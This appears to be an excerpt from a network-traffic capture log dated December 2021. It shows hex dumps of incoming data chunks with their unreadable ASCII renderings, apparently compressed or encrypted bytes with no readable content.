                                                                                              2021-12-13 23:57:11 UTC424INData Raw: f1 92 17 0a f5 2c a7 8e 56 8f f2 bc 15 75 af 06 3c 47 20 a8 cd 6d 6a 85 26 a8 eb 50 b2 66 de 52 ee 8a 73 6c b9 b2 87 85 ab d6 38 e5 ca ac cb 59 bf ba dc 96 2b 93 2c 7c 78 2d eb 6f eb 48 ae 8c b1 f4 e1 b5 33 23 57 26 d6 b3 5f 76 8d 6c 60 71 ec da 80 36 20 1b eb 56 87 97 b2 6d 83 93 be aa d5 e8 d5 9a 40 eb 52 12 b9 30 aa 2c 0e 20 ce 31 c8 09 6e 22 3f 68 3a 93 89 97 91 f1 e0 6f e9 15 2d 77 da 49 8d 97 8f 95 11 b1 0f 9a 9f 8b 63 9f 75 13 12 9a 6e 83 66 31 0b e2 8c c8 c0 76 a1 96 e3 b3 b1 00 ae af 65 44 cf cd c3 a0 e8 4f 72 17 71 2f ee b9 e3 7e e2 35 6a 66 20 c3 35 b8 3b 85 d7 91 6a d3 25 3c 77 e3 68 15 ab 80 e5 2e 19 e0 84 ec 86 23 f7 30 5a ca 37 d0 72 78 e3 3b 61 55 e2 bf c4 2f c8 de 76 ab 32 6b 8b 94 69 d7 a7 01 39 d6 de 07 db ab ca e9 12 36 f0 98 b0 10 48
                                                                                              Data Ascii: ,Vu<G mj&PfRsl8Y+,|x-oH3#W&_vl`q6 Vm@R0, 1n"?h:o-wIcunf1veDOrq/~5jf 5;j%<wh.#0Z7rx;aU/v2ki96H
                                                                                              2021-12-13 23:57:11 UTC440INData Raw: 0f 3d f0 be ab 57 0c 35 25 05 ff 50 5b 51 5c d0 0f 17 5c 30 54 05 d3 0a ea 1f 3d 47 77 c6 77 e6 68 4e 54 4a 2f 0c 77 ce 77 ce 99 39 e7 cc b9 73 67 46 92 fd b7 af 5f 25 af fe c7 6f 3d f9 a3 9f fc f4 57 9b ff 56 fc d7 bf bc 7f de fe 97 99 77 bb a3 c1 67 89 5f dc ad 8e fd 45 39 0a f9 fb 77 bf e3 5f 2b da 73 ff f0 07 7f 7f 78 e8 e8 fe fc f0 df eb 7f f5 87 f5 97 ed f6 5a e4 fa d5 a1 ff ba fa 27 3f fb cf 84 c5 5c 3f bf 98 fa c7 f7 22 7f 93 38 3e fe eb 63 e3 bf 6e 5f 27 ff f4 4f eb 6b 7f fd db 7f 9c f8 cd 9e 77 56 7f f6 e3 57 6d fc dc 9f ff fe d9 47 ff fc 24 f1 d1 bf f7 ff d9 ef 7d 7f 35 69 31 97 33 bf b3 f1 4d 74 88 6f 42 c4 37 c9 c4 37 21 e2 9b 64 e2 9b 10 f1 4d 32 f1 4d 8a f8 7e df 29 be 22 7f 93 1d f2 37 21 f2 37 c9 e4 6f 42 e4 6f 92 c9 df 84 c8 df 24 93 bf
                                                                                              Data Ascii: =W5%P[Q\\0T=GwwhNTJ/ww9sgF_%o=WVwg_E9w_+sxZ'?\?"8>cn_'OkwVWmG$}5i13MtoB77!dM2M~)"7!7oBo$
                                                                                              2021-12-13 23:57:11 UTC441INData Raw: b0 bf 12 91 93 58 c4 97 b1 52 3e d7 6e b5 9e 67 7c 18 01 99 81 f7 cd 3e e4 7d ba 0f 5e 9f ee 43 50 d0 1b c2 07 ec 63 c4 a7 db a6 62 d2 07 ec 2f 4f e4 24 b6 03 c5 d3 ed da ad d6 d7 19 1f c2 20 53 64 7c e8 ef d6 7d d8 20 3e d4 05 ed 13 3e 60 1f e1 6e dd 36 15 93 3e 60 7f fd 44 4e 62 cb 50 d6 04 4f de 1b 8c 7d 75 e0 87 0f 98 73 b8 d1 ad db ba a0 d0 d8 56 51 a1 65 1f d8 5e df 91 8c 35 78 c4 8d 9b 5a 2f 1c 30 c7 70 0c 64 36 0e 98 6d 9c 3c a2 c7 d0 7f 44 b7 2b 2c e8 b0 88 21 f6 31 76 44 b7 4d c5 64 0c b1 bf 49 22 27 b1 dd 23 f8 7f e7 5c bb d5 7a 97 c7 ec 43 14 64 fa 3d 66 1f e2 47 75 1f 6a c4 87 6d 41 07 e4 7c 07 ed 44 8f ea b6 a9 98 f4 01 fb 8b 13 39 89 95 a1 54 15 bb d5 fa 28 e3 43 03 64 06 99 71 b0 fc ba 0f 85 a3 ba 0f a5 a3 fa fc 8a 7d 34 88 6d 2a 26 7d c0
                                                                                              Data Ascii: XR>ng|>}^CPcb/O$ Sd|} >>`n6>`DNbPO}usVQe^5xZ/0pd6m<D+,!1vDMdI"'#\zCd=fGujmA|D9T(Cdq}4m*&}
                                                                                              2021-12-13 23:57:11 UTC457INData Raw: ee 39 c5 7b 24 f0 7a 12 9c 02 f7 82 fb 32 68 4c 7e 37 83 e6 cf 74 86 18 1b 07 15 de 61 78 44 a0 e1 e3 31 a6 d0 c4 a0 49 a4 17 24 ad f5 77 8a f9 65 a0 b1 6f 02 cd 06 11 ab 47 a1 75 18 a8 dc 7e 83 68 bb 29 85 c6 8d 72 1e 36 50 bb 3f 66 a0 7e d8 85 f4 2e 5c df 65 a0 b6 db 6d 10 75 59 50 78 07 10 cf 1b f0 7a d3 20 c6 47 fb 19 45 1b a2 dc 05 50 97 49 d4 83 c6 4c 11 c7 a8 c2 cb 9c 99 dc 1f 96 4c 31 2f 0e 9e d1 1e d3 8e cb b4 fd 52 5a 27 bd 2f a5 3f 7b 15 ef 4b 21 76 4f 26 b5 87 17 1c 41 fe 08 bc 39 79 1b ed 02 77 4b 65 de d4 d0 bb 34 1e 86 ce 6a cf b1 00 7c 0f 64 8a 31 b4 ef ac 62 bc a3 ac 63 52 fb 46 15 9a 18 34 0b 89 38 b3 c4 9a 51 1c 53 bc 27 98 25 c6 44 7f 4c f1 9e 60 16 d5 e7 06 f0 e6 2c 1a ab 5f cd a2 7d e2 71 a9 dc 3d 0a af 40 96 18 03 41 c5 bd 51 94 37
                                                                                              Data Ascii: 9{$z2hL~7taxD1I$weoGu~h)r6P?f~.\emuYPxz GEPILL1/RZ'/?{K!vO&A9ywKe4j|d1bcRF48QS'%DL`,_}q=@AQ7
                                                                                              2021-12-13 23:57:11 UTC458INData Raw: a0 f8 0c 60 5e 01 c5 59 58 40 d7 cd 05 14 67 4d 01 e6 7d 01 c5 d9 5a 40 71 da 0b 44 3f a4 fe 41 71 3e 87 66 10 9a f8 33 32 85 c6 8b 72 87 c0 51 78 ec 94 ca 1d 56 78 f8 a0 f1 17 38 93 fe 3e 68 fa 0f 57 1e 37 09 6d 10 da 50 01 ad 0d 61 30 52 40 eb 5e b4 80 da 75 16 8c 21 7f 1e f7 2d 42 bf c2 44 f1 f2 fd d4 76 49 dd 9f 66 13 f6 51 13 5e 0f 99 a8 3f ec 26 f2 77 20 ed c4 f5 cd b8 ff 0e a9 9c c9 ab 28 c7 6b a2 f8 46 e0 b3 13 be 4f a2 9c a7 c1 e7 90 bf 17 f7 fd a3 49 f4 e1 e2 25 ed f6 0f a2 8c 10 18 86 d7 af 4d ce a5 bd da f1 b1 b6 47 0c f5 4b 5b 4b e5 57 ac 45 5f ae 25 4f 4e 1e 4b fd 5a e9 f5 af c2 d3 81 7b e3 af 2b 14 f7 ba 51 de c3 28 ff a9 b5 52 fd 15 da 20 b4 6f 41 7b 1c 3c 29 79 38 74 03 9a 1e ba 42 ec e1 a0 b1 10 cf 26 0b 45 1d c6 14 1e b6 42 9c c5 40 87
                                                                                              Data Ascii: `^YX@gM}Z@qD?Aq>f32rQxVx8>hW7mPa0R@^u!-BDvIfQ^?&w (kFOI%MGK[KWE_%ONKZ{+Q(R oA{<)y8tB&EB@
                                                                                              2021-12-13 23:57:11 UTC474INData Raw: 59 da ca 00 7c 91 ef 4c 1a 1d 5c 91 67 a4 46 7c 78 4f d0 8e ab 53 b0 05 05 60 3e 1c f7 89 0b 9a 18 f6 90 4f e7 a4 ce b6 15 50 96 77 4c a8 1e a7 89 51 73 ae 63 90 b6 3c 44 e3 f2 26 8a 85 e3 55 43 f8 3c 86 de 9d ae 74 95 e5 53 62 4f cf c7 57 2c bb 63 0b 5b 22 68 b9 13 d0 b8 db aa db 98 0b b8 b4 92 71 45 b5 c9 6e e1 3c 07 38 2a ed 7a 98 a8 60 15 ab 67 82 61 d4 b4 d2 95 06 2a 8c 59 b5 38 2b 01 6e 06 e1 91 8b 0d 5c 20 97 cb fb 43 54 a5 06 b6 f9 29 93 6e b1 c5 47 5c 47 18 84 cb d6 d0 6e af 35 1f 03 8e a5 5a b6 39 e4 d3 3a 26 94 27 f5 1e f7 f7 aa ac 98 69 fc bb 7c 2c 1e a8 ed 96 64 84 2e 77 4c 33 67 59 e4 75 73 b8 1c 4b 1e 49 57 22 25 0f a4 2b 11 bd 58 93 1a 89 d9 a3 5e 45 a5 55 cb 16 59 b2 71 8c 23 55 8b 73 08 25 02 4c 6f 23 2c 25 dd ff cd 34 ae 61 5e ce ca da
                                                                                              Data Ascii: Y|L\gF|xOS`>OPwLQsc<D&UC<tSbOW,c["hqEn<8*z`ga*Y8+n\ CT)nG\Gn5Z9:&'i|,d.wL3gYusKIW"%+X^EUYq#Us%Lo#,%4a^
                                                                                              2021-12-13 23:57:11 UTC475INData Raw: cf a2 58 97 c2 1f af e6 77 3d 39 15 87 fd df 10 4a a2 8c e4 40 53 57 c2 79 6f 18 d8 96 e6 6f f1 3c ca 4f e3 ef 57 16 5d 11 71 d4 e1 13 e9 d2 cc 0c 6e 81 68 93 68 5b 8e 5b 72 66 0b 8b e2 fd 1d 32 0c 57 11 c0 29 14 5b 4f 63 78 cc b8 3c e4 d1 93 ab c3 d3 82 33 a8 a8 b0 b6 6b 06 54 6a a7 2b ea 02 83 74 d4 ea 36 ae 2b ca 30 09 13 1d 7c 21 c2 e5 94 1f 9e 17 b9 2b 78 8e 05 c4 7b 3c cc ac a1 d3 e8 d7 b2 78 4e b5 79 b4 fc 08 f7 48 0b 3a 6e 64 55 bb 0d ef 06 e4 da b0 81 33 fd 3d e6 3b ab 16 d9 a9 b3 d3 14 db 57 2d 80 a9 34 71 48 a5 5d 1c bc c6 a4 d8 71 0d aa 0b 58 92 05 38 d9 e3 52 61 d1 a5 17 98 14 77 ac 1b aa c3 dd 69 2a 2c 75 d8 9e 52 70 96 98 44 6c 19 4f 2b c6 2c 1b 19 7d 6e 53 67 5b 73 f1 9b 89 44 bd fc f6 cc 93 c9 59 29 dc e9 1a 9d 26 5b 11 6c 61 7d 35 d0 73
                                                                                              Data Ascii: Xw=9J@SWyoo<OW]qnhh[[rf2W)[Ocx<3kTj+t6+0|!+x{<xNyH:ndU3=;W-4qH]qX8Rawi*,uRpDlO+,}nSg[sDY)&[la}5s
                                                                                              2021-12-13 23:57:11 UTC491INData Raw: 48 be da 4f 0a 57 8b ee 33 cf ca 15 40 22 d5 d7 4b 5c 02 19 6d 54 79 d0 52 55 d1 5e 3e 91 76 a4 e0 27 b0 82 d2 41 1c 92 f7 78 98 a9 a2 b5 a2 e7 3a fc b2 19 8f 50 cc 86 ac ad 90 c8 fa d4 d6 37 95 ad dd b4 0f 0a ba 55 dc 51 95 4e 47 d5 43 c3 dd af 5d ee 1f 83 3f cc 4a 43 08 d9 d9 dd 42 91 a0 b4 77 94 d5 6d 97 86 02 fa 3f aa 63 ad 41 7e c8 dc 4d 8f 4b ab 61 57 2e bf 3f d2 b3 d3 35 65 d0 e9 55 ac b4 a3 95 62 fa 09 c3 ae bd c7 e0 e7 3f 85 a9 87 5d ea 93 25 06 32 b6 52 5d 10 ab 62 1a 0b e9 21 f7 14 f4 cf 9f e5 75 4a 5a 8f f2 eb 59 38 65 ff 45 f9 d9 21 81 37 0e 16 59 1a d7 47 0e bb 47 0d d5 e6 0d 26 c8 bf bc 50 46 8f 29 1e 5c 3f 62 30 29 d6 a4 fc 19 5f 5c 2c 3c a6 cb 38 fe 9c db c8 de 06 5e f9 8c bb c9 4d 5e 2a 4e f5 e8 8e e7 9c 45 32 73 f1 86 7e 54 c1 d3 84 57
                                                                                              Data Ascii: HOW3@"K\mTyRU^>v'Ax:P7UQNGC]?JCBwm?cA~MKaW.?5eUb?]%2R]b!uJZY8eE!7YGG&PF)\?b0)_\,<8^M^*NE2s~TW
                                                                                              2021-12-13 23:57:11 UTC492INData Raw: 0c 84 4b be 9c b4 5a 50 da c6 83 59 c5 75 75 58 d8 f7 e2 33 d4 2f 03 0b 48 a3 8a 0d ed 54 65 90 fa 73 40 d7 df fb a0 5a 67 b9 c0 7d bb 4f 68 a3 72 a7 29 c9 b5 ee fd b4 d8 24 09 63 b5 c7 0e e6 21 5c 71 05 5d 64 f0 93 8b c3 5d b1 87 cc 9e 5d 01 fc b5 f7 75 eb 97 db d0 12 7b 4c 75 84 25 5b 86 db 1c 4e 3e de 4d 48 a7 41 2e 14 8b 72 96 45 ae 8d c7 69 b9 85 eb 7b d6 c6 3e c6 8a 9c 3b 67 76 67 e7 83 e4 cf bf 1e 7e 77 f7 ca 85 ce d9 cc 86 66 41 f9 09 b0 ee ae 85 2f fe ca 4a 39 d8 b0 96 41 3e cc 66 44 18 87 56 0e 46 a0 8f 09 56 eb 00 3a 78 f1 87 73 48 74 ec 43 4b e8 ff f6 09 09 eb 1c 12 b3 fd 2b f9 cf 62 e2 5f 01 53 61 7a 42 55 91 80 d5 16 50 59 ea c9 c1 5d 4f ef 71 ce 1a 48 3f d3 af 4e 49 73 2a da 50 d1 46 b4 af c3 c2 24 18 f0 87 3b 7e b1 31 3a 58 91 11 93 79 69
                                                                                              Data Ascii: KZPYuuX3/HTes@Zg}Ohr)$c!\q]d]]u{Lu%[N>MHA.rEi{>;gvg~wfA/J9A>fDVFV:xsHtCK+b_SazBUPY]OqH?NIs*PF$;~1:Xyi
                                                                                              2021-12-13 23:57:11 UTC508INData Raw: 9f 56 6f 5d ae cf 4b 6c ba c8 06 47 66 31 7a ef a7 bf bf 7d 9a eb ef af 05 e9 ef 38 54 a4 2b 4e e8 fa 3b 14 e3 a1 a2 4d 1b 00 44 b1 e2 7a de 8b 4c 85 5e b8 68 81 72 1b d9 10 65 da 60 21 4e f3 38 a7 65 ca 9e 8d b1 06 a7 65 ec 7e 67 a6 ba ff cc 0b 9a 13 d4 6a 97 bc 70 81 ff 28 1d 01 b8 16 2e 58 be cc 67 48 b7 9c 79 61 f9 32 d1 56 50 42 81 a0 c5 86 b2 c4 13 68 28 3d ee 8b 89 d5 b3 98 ae f0 16 6e 9d a6 cf 4c e2 7c 95 78 0b b4 93 37 63 25 ee bb 0f 46 8b 08 19 cb 19 f8 3a ec e9 5f fb 63 60 a5 d1 95 e4 f6 27 42 f8 c6 e3 75 6d d5 b7 71 65 e4 20 cd 14 a8 7e ba 99 a3 02 af 87 7e d4 34 8e e2 38 ce 43 94 f6 a2 08 30 f8 4a 0f 57 2d af 1b cb 19 3b fb 2a 54 2d 49 f3 72 9c 76 14 79 c1 4c 7c 13 c8 04 d7 8b 70 b5 26 bd db fa 9e ca 55 0d 33 71 76 6f 6a e4 7a 5e 37 6d ba 89
                                                                                              Data Ascii: Vo]KlGf1z}8T+N;MDzL^hre`!N8ee~gjp(.XgHya2VPBh(=nL|x7c%F:_c`'Bumqe ~~48C0JW-;*T-IrvyL|p&U3qvojz^7m
                                                                                              2021-12-13 23:57:11 UTC509INData Raw: bf 3f 92 28 f9 e5 cf 5b 8f 9c 5e ac af 60 d6 68 1b 7d f3 b3 33 a1 a4 f7 5b ff a2 86 a9 cb 65 75 9e 59 9d 6f 59 b8 78 b9 af 29 e4 28 44 96 b2 9f 59 a0 36 dc 86 77 d5 38 ff f8 cc 82 f8 5d 4a 18 0f 30 e8 f3 3d 47 70 96 a9 66 3a 03 56 06 91 0f c9 61 60 eb ff c1 31 cc b0 04 af 6a c2 99 74 19 1f 66 36 b1 ce eb 23 c1 4b 86 c7 b4 af 97 ce e1 f4 b0 51 31 b9 77 19 d8 ab 8c af 46 a6 43 e0 da 0f 9e bd 4d 38 fb b6 04 90 64 6f c2 01 d2 c4 ce 21 e7 79 94 38 99 2f 73 2d 4b 73 fb 6c ee 1e b3 eb b8 7b a7 4d cc 05 d1 3f 03 cc f3 b8 3a 4e 3f 3d ae 69 d7 7b a1 d2 9f 1f 8f cb e7 c4 db f6 f5 d3 62 29 9d 78 b7 ca ed ef 7e a6 69 be ad 21 ed ff 46 57 c8 28 bd 6b bc f9 31 bd b5 7b 72 bb 21 e5 2b eb 70 77 09 5d 71 23 4a 1f 1f 3d 74 0b ba 8e 6e 9a 79 a3 78 d9 89 3e ab 0d cf 6d 66 d2
                                                                                              Data Ascii: ?([^`h}3[euYoYx)(DY6w8]J0=Gpf:Va`1jtf6#KQ1wFCM8do!y8/s-Ksl{M?:N?=i{b)x~i!FW(k1{r!+pw]q#J=tnyx>mf
                                                                                              2021-12-13 23:57:11 UTC525INData Raw: ff 18 72 0c 12 bf 96 24 80 78 18 41 d2 10 ce 4a 7a 48 a8 6a 02 88 62 84 e0 94 7c a1 db d6 ee dd a7 e3 e8 66 08 75 03 eb 53 b0 be 86 69 01 66 5e ca 8c 47 65 07 8c f3 fa 23 da f1 e6 0c 6a ff 17 e3 66 a2 47 74 35 8b 4b e7 88 97 0c 67 85 71 40 89 b0 37 2a c3 c8 d0 ba 03 ae b3 dc 4f b5 3d 9f ce ef ea c2 f1 1f 1a ed 3b 00 63 13 ad 8f d5 67 99 de ad 05 6b f4 1a 33 9b 6c 0f c1 88 2e 0b 5b f3 61 48 fc 57 3f 87 0e 6a d5 c4 66 cf ed c6 01 57 37 5a 7e 87 ac 82 af eb e4 22 ed ab f6 1f 5e 82 ac 7b 91 aa 3e 76 92 88 51 73 72 1b bd e0 3b 2a cb 49 8c 59 9a 53 5e 40 cc bf 45 cb 4e 06 1f 31 64 02 80 0f 17 0f 54 9b 12 2a 3e d1 b6 0a de fb 34 5f 6d 5e 2d e5 64 22 16 34 0a 16 b6 75 64 bb a3 8c 1d cf 82 0a 67 b7 e2 98 17 a8 61 cb 7d 81 4f d9 07 7d 69 92 14 15 ee 9c 59 52 a1 cc
                                                                                              Data Ascii: r$xAJzHjb|fuSif^Ge#jfGt5Kgq@7*O=;cgk3l.[aHW?jfW7Z~"^{>vQsr;*IYS^@EN1dT*>4_m^-d"4udga}O}iYR
                                                                                              2021-12-13 23:57:11 UTC526INData Raw: 34 93 91 41 6f 7f 12 2d e0 ca 78 a1 8d a0 39 53 95 e3 76 60 67 46 a2 e2 30 c9 88 ba dd a0 06 b7 cb 24 9c fc 30 b7 ee 6c e5 15 69 09 6d 24 82 58 9e 04 ff c8 04 4d 9d 42 22 e0 39 ed c9 94 b9 2e 4a 66 55 f6 83 8e 43 e8 59 95 1c 7c 18 39 9f f0 9d 7a 0b 94 e1 3c 19 3c f5 68 c7 dc 8d 72 ba eb f7 7c db 50 bd 7e b7 4d 24 ae 2e ef d1 a8 f9 29 5e 9e ba 3f ae 3a 53 f2 b4 a6 05 ee 4e 4c 63 5a 88 6a e2 fb be 49 57 9d 18 fc a5 83 46 75 13 84 bd 8b b9 f1 ac 37 83 ba 7f 07 aa a2 b8 11 fa 0c f7 dc 8e 7d 27 f8 5f 1d f0 07 d5 8d 3e f9 04 43 38 43 06 04 a3 72 b1 20 19 69 7d f7 4c 93 0b 38 be 00 b7 a1 81 0e 6a 68 0f 31 35 bc 79 35 b7 21 4b 7e 64 e3 69 8d 5f 95 71 4d 78 92 ae 34 c9 db 03 43 8a f4 3a 6f 65 6c 22 94 4d d4 76 f7 b4 a7 24 97 0d 02 61 e8 a1 46 3d 41 df 7e 01 34 a1
                                                                                              Data Ascii: 4Ao-x9Sv`gF0$0lim$XMB"9.JfUCY|9z<<hr|P~M$.)^?:SNLcZjIWFu7}'_>C8Cr i}L8jh15y5!K~di_qMx4C:oel"Mv$aF=A~4
                                                                                              2021-12-13 23:57:11 UTC542INData Raw: cc cf f7 75 a5 53 c9 63 78 89 c5 ac a6 31 c2 bd 42 49 c2 38 76 e7 f9 0a d8 53 01 af 7b a4 50 16 d3 c6 62 56 7b 05 ff e9 21 b1 3f b1 e3 d3 95 dd a7 08 63 78 99 5d f9 4f 15 53 78 ab 12 c7 ea 62 f2 d4 57 4f 7d ed c9 f9 0f da 93 f3 1f b4 27 47 10 62 7c b2 ae 5c 93 22 e5 26 7a 6d 09 cb 35 81 cf 98 33 eb 14 62 3f 6b 57 93 f2 13 ff 24 aa 9f ce cb 05 f9 79 e7 2c 5a ef f4 2d 10 d1 cf dc 9d 53 ca e9 ac d3 60 66 e7 0a 7e d6 09 2e af e0 67 9d b5 5f d3 67 a5 57 90 10 a6 7d b3 1a fb e7 1c 70 2e 38 0f 9c 0f 3e 02 3e 0a fe 1a ac 00 ef 02 27 82 93 c0 4a 70 32 38 05 bc 1b ac 02 ef 01 ef 05 a7 82 d3 c0 fb c0 fb c1 07 c0 e1 60 31 38 02 1c 09 8e 02 4b c0 52 70 34 58 06 8e 01 ef 04 c7 82 e5 e0 38 70 3c 38 01 cc 05 6f 07 ef 00 f3 c0 fe e0 00 30 1f 2c 00 07 82 83 c0 c1 60 21 38
                                                                                              Data Ascii: uScx1BI8vS{PbV{!?cx]OSxbWO}'Gb|\"&zm53b?kW$y,Z-S`f~.g_gW}p.8>>'Jp28`18KRp4X8p<8o0,`!8
                                                                                              2021-12-13 23:57:11 UTC543INData Raw: 95 f5 fa 4b 21 6a 7b 3e 93 5a 48 ef 6b cb 7d 39 7e 92 bd fa 89 e0 21 73 9a 3c 83 e5 da 22 ad 0d 18 ee 95 81 52 f3 5e f3 6c f0 3d dd ee 6b 58 7a 5d ec 11 e8 13 fa c0 9f 26 1f 90 6e 50 9a 84 68 46 f6 f0 d1 ae f2 84 a5 8b 8b 5f f8 ba 83 74 ff c6 97 95 dc 5a b6 53 b2 92 6d 9e 49 1e a8 ae 51 c3 d2 30 2d 47 70 62 73 6b 9d eb 62 6b 08 4b 07 69 26 e5 e7 22 f2 51 63 af 2b 4b 5e cf ca ef 90 12 96 f2 cc 2c d9 12 ed 94 4f fd 9f 78 1f f6 65 8a 2f ab bf b3 32 b9 2e 8d cf ff 7e 6d 68 20 2c 9d 8a d4 f9 25 7b da 24 7d e5 df 16 7c 3e 14 96 36 4b 5f f1 94 ad ec da a7 5d 27 7a 5c 1e 26 8f 4a b1 6d 8f 78 ff 14 14 dd 99 62 a6 b8 ca 3f d8 9d 6f da be 32 84 fb 47 85 f8 a3 d8 27 74 7f 68 5b 68 28 93 3f 4a da c1 fb be 4c fe 42 21 fe a8 b4 57 af 72 93 6e a3 4b 36 a8 df 9d 2c 8f 96
                                                                                              Data Ascii: K!j{>ZHk}9~!s<"R^l=kXz]&nPhF_tZSmIQ0-GpbskbkKi&"Qc+K^,Oxe/2.~mh ,%{$}|>6K_]'z\&Jmxb?o2G'th[h(?JLB!WrnK6,
                                                                                              2021-12-13 23:57:11 UTC559INData Raw: 07 1a a1 b6 c7 d7 2b 5b a0 b3 94 f5 8d d8 cb c1 88 67 05 ee 84 ba e1 a1 e3 72 44 b1 b0 d4 ae b7 3a b2 63 43 17 d8 b0 cf 54 ef 50 8d 56 81 00 eb fc 27 0a a0 d9 b1 5a c1 36 2b a8 31 fb 1c bf a8 0d 1b 5c 10 3a 91 09 44 0c e7 84 95 9d 88 55 07 58 75 f4 6e 8e 35 12 b1 ea 16 d8 18 76 dd 70 19 3b 4c 92 a6 a7 3c 6c af f6 4e ea 86 36 fb de ee 28 c3 01 65 38 6d c8 0e 10 1a be 40 81 2a 14 50 d5 ec 54 11 90 8e f4 72 1f 80 fd 63 33 39 49 7c 05 a2 f1 2e 41 c8 9a 54 20 26 26 19 84 ac e1 05 a2 f0 dd 6f 21 59 7d e1 7d e0 f5 04 c3 2b a5 20 31 fc 27 cf 51 d9 c3 3b b9 40 cc 7f 75 8b 10 f0 0a f3 de 57 20 be f5 9c 4a e1 15 e2 8d 75 88 8b 30 36 d5 08 0a 7f 8d 57 ef 10 c3 e5 ef 14 c3 6e 8f a6 92 7c fd 32 6d 4d c1 29 89 40 67 9b e0 5d 6d ad 52 0d 13 30 ac 54 53 ed e8 54 e7 0e 23
                                                                                              Data Ascii: +[grD:cCTPV'Z6+1\:DUXun5vp;L<lN6(e8m@*PTrc39I|.AT &&o!Y}}+ 1'Q;@uW Ju06Wn|2mM)@g]mR0TST#
                                                                                              2021-12-13 23:57:11 UTC560INData Raw: 32 8a 27 1f 7c 26 08 7e 89 20 d7 81 12 41 bb 94 f4 d4 45 5c 24 18 33 a8 53 f4 52 be 06 01 8c d8 18 cc 07 ab 2b ed 32 39 c9 19 f1 7a a1 9f 11 df e6 dc 9b d1 25 2b 75 7f e0 4c a8 ec ca 83 cb 32 0f e2 ce 77 67 c0 df 78 ac f8 0b 6e 6d 3c b1 b4 bb f5 49 c8 80 7b 90 01 cd c0 50 3d b1 18 0b 1a 45 be 9a a3 75 32 3e a8 b8 b7 61 7b 8d ae 0c ea be 49 ef b2 18 91 2f 07 a7 d8 6f 92 63 18 58 0c 98 13 9a 90 3f 80 d8 ea d2 66 5d 9d 45 eb f7 2a 58 b4 ad 50 c9 a2 c1 8f 71 16 f5 bb 4b c1 22 3d ab c7 b3 a6 73 a1 a9 f5 53 96 99 ca 32 aa 75 96 ae d6 25 b3 f7 1a df b2 11 28 0b 9b c9 41 26 8b 6c eb 10 b9 48 ec e7 6d 20 26 ab d3 90 17 6d 19 34 79 93 cf 65 69 f7 46 26 e3 62 99 a5 3d c8 d7 91 d3 ce 46 08 9f b0 a6 91 57 e0 59 d6 3d 23 04 10 a3 2b 29 4a b2 fe 02 f4 af 21 91 af d8 84
                                                                                              Data Ascii: 2'|&~ AE\$3SR+29z%+uL2wgxnm<I{P=Eu2>a{I/ocX?f]E*XPqK"=sS2u%(A&lHm &m4yeiF&b=FWY=#+)J!
                                                                                              2021-12-13 23:57:11 UTC576INData Raw: d8 cb 8d fe 3b eb ba 43 91 79 c9 51 b8 00 e7 21 3a 31 c2 cf 81 03 bf b1 2d 12 ba a5 94 67 b3 e5 13 ae b3 1b b8 7f 09 90 ad 8a f2 4f 86 9b de e1 43 01 5a bf 46 44 38 0e 51 c3 39 51 e4 86 16 ed fb b0 5d f7 8a e1 ed 7d 65 1f 88 f1 17 20 e8 6d ec 47 49 af 8d 5f 31 ef b1 03 c1 fb 79 f4 c6 6e 75 db a3 90 8b 2a 61 2f 8c 19 db 74 07 d1 e9 03 9a b6 bd 53 bd 46 e0 69 ba 8c db aa 0f a0 ff 0e e8 6e b6 c5 32 90 16 28 b8 6d 1b 98 f3 18 40 17 0f fd 15 26 ec fd cc 50 e8 2e 75 71 d4 39 fc 68 fa 02 3f 30 0f 8e 71 98 bc 60 bb 91 4d 98 2a 13 a3 54 cc 41 8c e2 0c 90 1d 18 6d 8e 71 a9 12 48 aa 0c 82 0e 7a ea 2d ec ee 02 74 42 79 1b 19 95 cc f1 4e b5 e4 a8 3e 20 39 62 e5 20 73 0d 77 60 fa 62 48 3b cc 16 ed 21 74 15 1f cb 66 98 e9 ad d0 12 3d e9 16 34 5a 12 19 4b 28 31 09 a8 24
                                                                                              Data Ascii: ;CyQ!:1-gOCZFD8Q9Q]}e mGI_1ynu*a/tSFin2(m@&P.uq9h?0q`M*TAmqHz-tByN> 9b sw`bH;!tf=4ZK(1$
                                                                                              2021-12-13 23:57:11 UTC577INData Raw: d5 4c 9f 2a 90 6e 8c 32 b5 90 44 1d 3b 84 22 b1 eb 41 0e 42 db b3 38 b3 d6 7e 88 63 8e 3f 38 b3 9d 4f 83 43 4a 78 f0 23 2c 18 26 72 f2 5e f8 3c 59 6f 9a ca e7 5c 02 92 f3 ca 8e c0 09 88 2b 02 cf 72 d3 67 3c cb d9 9f 07 b2 1c c9 a8 2f cf e7 59 36 14 6e 61 cd 92 a6 65 f1 6c d7 5a 96 4c ef 90 77 56 83 b2 5d 5f 89 11 0b 78 cd 4a f1 67 bb b0 43 ca f6 1a 1e 32 94 65 db 58 46 8d 86 22 a8 d0 ec fc 1b d6 6f e6 1d c9 bd d1 d8 84 1a c8 0c 9c a0 99 cd b1 d0 ef 9f e6 59 9f ff ef 20 ce ac e9 e0 9c f1 16 f3 e0 87 58 70 90 ea 31 f2 86 dd 4c e9 b8 ac ca ee 43 0e 07 ce 30 1d 30 bc 59 e6 55 c7 ef 2f dc 6f 1b 62 28 9a 9a d1 69 2d b8 24 d4 65 dd 0c 2f f1 f4 9a 01 86 a2 09 e0 35 0e 7c c2 ad e3 c4 fa 35 a8 50 af de a1 66 f6 aa c8 39 bc 89 79 ea 4a 29 4a 0c 8f 72 83 a1 68 26 7a
                                                                                              Data Ascii: L*n2D;"AB8~c?8OCJx#,&r^<Yo\+rg</Y6naelZLwV]_xJgC2eXF"oY Xp1LC00YU/ob(i-$e/5|5Pf9yJ)Jrh&z
                                                                                              2021-12-13 23:57:11 UTC593INData Raw: f1 c5 33 d7 ad 5c 6c 5a 8b 7e d3 16 3f ce c2 a6 ad b0 b1 f7 f8 45 8b d8 3b dd fe 07 f6 4e b3 2f 67 ef 09 4b 57 b3 f7 a4 45 4b 57 33 ff 15 1c 6e fc 53 fc fd 70 16 4f 63 f6 8a 2c f6 4e 7e 72 25 87 1f 9d 92 b5 e2 c9 74 5b 96 44 c3 8c ae df 63 82 bf 41 7e 5a ec f7 41 3c eb 82 c3 93 56 ac 58 ae 0c 4f 5a 65 cb c2 ef e4 75 42 d0 37 e2 51 7e 63 3c 41 0c a9 01 46 79 36 ce 03 ce 69 22 66 22 fa 15 4f ae 5c 98 b5 98 8b 3c 2a 59 18 9f 0d e1 e1 8f 65 4d 05 59 7c 26 f0 2b ec b1 2c d3 d3 f6 85 cb 7b 3d 96 35 31 6b 31 20 ce 42 5f 83 74 41 b1 c4 d8 55 10 f1 90 63 42 ac d6 c7 ad 15 88 31 ec a3 d9 fc aa 20 70 d7 0c 70 1d 3a f4 11 e0 